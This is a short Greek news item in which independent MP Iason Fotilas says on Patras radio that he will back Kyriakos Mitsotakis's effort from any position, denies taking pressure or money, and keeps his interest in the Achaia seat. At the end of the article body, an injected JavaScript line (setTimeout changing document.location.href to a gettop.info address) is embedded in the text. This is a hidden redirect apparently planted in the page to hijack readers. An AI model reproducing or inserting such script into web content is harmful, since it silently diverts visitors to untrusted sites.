Φωτήλας: Θα στηρίξω την προσπάθεια Μητσοτάκη από οποιαδήποτε θέση

0
5

 

Δεν έχει συζητήσει με τη ΝΔ ακόμη ενώ δηλώνει ότι θα στηρίξει την προσπάθεια του Κυριάκου Μητσοάκη από οποιαδήποτε θέση σε δηλώσεις του στον ραδιοφωνικό σταθμό ANT1 Πάτρας 105,3, ο ανεξάρτητος πλέον βουλευτής Ιάσων Φωτήλας.

Μεταξύ άλλων αποκάλυψε: «Έχω σκοπό να στηρίξω την προσπάθεια του Κυριάκου Μητσοτάκη από οποιαδήποτε θέση» , ωστόσο αποσαφήνισε ότι δεν έχει υπάρξει ως ώρα καμία συζήτηση με τη ΝΔ , είπε όπως: «Αν με καλέσουν θα το δω με συμπάθεια«.

Ο ανεξάρτητος πλέον βουλετής Αχαϊας διέψευσε επίσης ότι δέχθηκε πιέσεις και είπε: «Δεν δέχθηκα καμία πίεση κι ας είπαν κάποιοι ότι πήρα και λεφτά»

Όπως έγραψε το tempo24.gr, για την επιδίωξη της κατακτησης της βουλευτικής έδρας, έστω και με άλλο κόμμα, τόνισε ότι εύκολα θα μπορούσε να το επιδιώξει μέσω του ΠΑΣΟΚ, δεδομένης της πολιτικής σύνδεσης του ονόματος Φωτήλα με το χώρο του ΠΑΣΟΚ.

Δεν έκρυψε πάντως πως διατηρεί το ενδιαφέρον για την έδρα στην Αχαΐα, τονίζοντας χαρακτηριστικά «μόνο μέσα από το κοινοβούλιο μπορώ να παλέψω κατά της συμμορίας» εννοώντας την κυβερνητική συμπραξη ΣΥΡΙΖΑ-ΑΝΕΛ». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here